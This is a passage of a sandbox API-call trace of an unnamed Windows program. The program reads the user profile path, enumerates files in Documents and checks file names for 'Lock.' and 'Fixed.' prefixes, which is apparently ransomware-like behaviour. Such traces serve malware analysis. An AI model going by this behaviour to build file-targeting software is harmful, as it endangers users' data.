Flags=0x0, Size=0xc) returned 0x24aa968 [0262.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0262.475] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0262.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0262.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0262.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0262.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0262.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0262.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0262.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0262.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0262.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0262.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0262.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0262.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0262.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0262.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0262.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0262.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0262.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24207f0 [0262.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0262.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0262.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0262.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0262.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0262.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0262.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0262.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0262.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0262.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0262.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0262.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0262.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0262.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0262.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0262.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0262.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0262.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0262.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0262.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0262.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0262.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0262.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x7a) returned 0x24f2068 [0262.478] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/G0mzKIgpl5aj2M-.pptx", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\G0mzKIgpl5aj2M-.pptx", lpFilePart=0x8bf658*="G0mzKIgpl5aj2M-.pptx") returned 0x3c [0262.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f2068 | out: hHeap=0x25c0000) returned 1 [0262.478] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\G0mzKIgpl5aj2M-.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\g0mzkigpl5aj2m-.pptx")) returned 0xffffffff [0262.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0262.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0262.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0262.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0262.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0262.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0262.478] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0262.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0262.478] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0262.478] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0262.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0262.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0262.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0262.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0262.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0262.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0262.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0262.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0262.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0262.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0262.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0262.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0262.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0262.479] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="goQ5n58_cIUllMnUx.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0262.479] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oQ5n58_cIUllMnUx.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0262.479] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Q5n58_cIUllMnUx.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0262.479] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5n58_cIUllMnUx.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0262.479] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n58_cIUllMnUx.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0262.479] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="58_cIUllMnUx.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0262.479] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8_cIUllMnUx.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0262.479] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_cIUllMnUx.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0262.479] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cIUllMnUx.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0262.479] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IUllMnUx.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0262.479] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UllMnUx.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0262.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="llMnUx.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0262.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lMnUx.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0262.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MnUx.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0262.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nUx.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0262.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ux.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0262.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0262.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0262.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0262.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0262.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0262.480] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0262.480] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0262.480] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0262.480] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0262.480] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0262.480] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0262.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="goQ5n58_cIUllMnUx.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0262.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oQ5n58_cIUllMnUx.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0262.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Q5n58_cIUllMnUx.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0262.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5n58_cIUllMnUx.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0262.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n58_cIUllMnUx.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0262.481] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="58_cIUllMnUx.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0262.481] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8_cIUllMnUx.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0262.481] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_cIUllMnUx.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0262.481] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cIUllMnUx.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0262.481] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IUllMnUx.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0262.481] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UllMnUx.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0262.481] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="llMnUx.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0262.481] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lMnUx.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0262.481] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MnUx.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0262.481] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nUx.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0262.481] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ux.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0262.481] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0262.481] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0262.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0262.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0262.481] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0262.481] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0262.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0262.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0262.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9e88 [0262.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0262.482] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0262.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0262.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0262.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d68 [0262.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0262.482] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0262.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0262.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0262.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0262.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0262.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0262.482] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0262.482] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.482] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0262.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0262.482] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0262.482] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0262.483] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0262.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0262.483] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0262.483] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0262.483] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/goQ5n58_cIUllMnUx.xlsx", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x200939b0, ftCreationTime.dwHighDateTime=0x1d4a571, ftLastAccessTime.dwLowDateTime=0x6ef507e0, ftLastAccessTime.dwHighDateTime=0x1d4c720, ftLastWriteTime.dwLowDateTime=0x6ef507e0, ftLastWriteTime.dwHighDateTime=0x1d4c720, nFileSizeHigh=0x0, nFileSizeLow=0x9e84, dwReserved0=0x9c80047, dwReserved1=0x24480, cFileName="goQ5n58_cIUllMnUx.xlsx", cAlternateFileName="GOQ5N5~1.XLS")) returned 0xaa5760 [0262.483] FindClose (in: hFindFile=0xaa5760 | out: hFindFile=0xaa5760) returned 1 [0262.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0262.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0262.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0262.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0262.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0262.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0262.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0262.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0262.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0262.483] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0262.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0262.484] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0262.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0262.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0262.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0262.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0262.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0262.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0262.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0262.484] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0262.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0262.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0262.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0262.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0262.484] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0262.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0262.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0262.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0262.484] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0262.484] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0262.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0262.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0262.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0262.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0262.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0262.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0262.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0262.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0262.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0262.485] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0262.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0262.485] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0262.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0262.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0262.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa878 [0262.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0262.485] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0262.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0262.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0262.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0262.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0262.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0262.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0262.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0262.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0262.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0262.486] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0262.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0262.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0262.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 